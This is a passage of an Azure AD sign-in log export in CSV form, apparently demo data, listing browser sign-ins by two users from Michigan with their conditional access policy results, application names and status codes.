'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:02,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",1dbd81fd-18f7-4582-ba72-d8f2dad20e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,1dbd81fd-18f7-4582-ba72-d8f2dad20e00,SigninLogs,Failed,41.90428925,-85.99833679
+1141,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:16.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fcffe835-b94b-4ea3-828a-c627f7ac27b5,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:02,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",1dbd81fd-18f7-4582-ba72-d8f21fd30e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,1dbd81fd-18f7-4582-ba72-d8f21fd30e00,SigninLogs,Sucess,41.90428925,-85.99833679
+1142,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:16.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fcffe835-b94b-4ea3-828a-c627f7ac27b5,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:02,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",1dbd81fd-18f7-4582-ba72-d8f21fd30e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,1dbd81fd-18f7-4582-ba72-d8f21fd30e00,SigninLogs,Sucess,41.90428925,-85.99833679
+1143,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:59.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,372a01ad-c09f-4dac-9aef-15af403bb121,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:03,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d09c2317-414d-4072-ab4f-d2f6c7a50e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,d09c2317-414d-4072-ab4f-d2f6c7a50e00,SigninLogs,Sucess,41.90428925,-85.99833679
+1144,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:53.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1f4d5299-a9ac-463c-925b-128eeaadf581,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:03,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d09c2317-414d-4072-ab4f-d2f6f3a40e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,d09c2317-414d-4072-ab4f-d2f6f3a40e00,SigninLogs,Sucess,41.90428925,-85.99833679
+1145,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:59.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,372a01ad-c09f-4dac-9aef-15af403bb121,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:03,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d09c2317-414d-4072-ab4f-d2f6c7a50e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,d09c2317-414d-4072-ab4f-d2f6c7a50e00,SigninLogs,Sucess,41.90428925,-85.99833679
+1146,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:57.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f43cafc3-d5d3-4b15-b383-53d9310fa46b,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:03,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",99476ccd-67d1-454b-a7cf-079e88b40d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,99476ccd-67d1-454b-a7cf-079e88b40d00,SigninLogs,Sucess,41.90428925,-85.99833679
+1147,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:47.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,daed9055-fbab-46c2-a243-813fdcc6e8cc,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:03,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",4c926580-a7d1-4f3d-971f-7f0b04660d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,4c926580-a7d1-4f3d-971f-7f0b04660d00,SigninLogs,Sucess,41.90428925,-85.99833679
+1148,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:55.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3fc4bea7-e1fa-481e-8e82-279aaf7dbc12,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 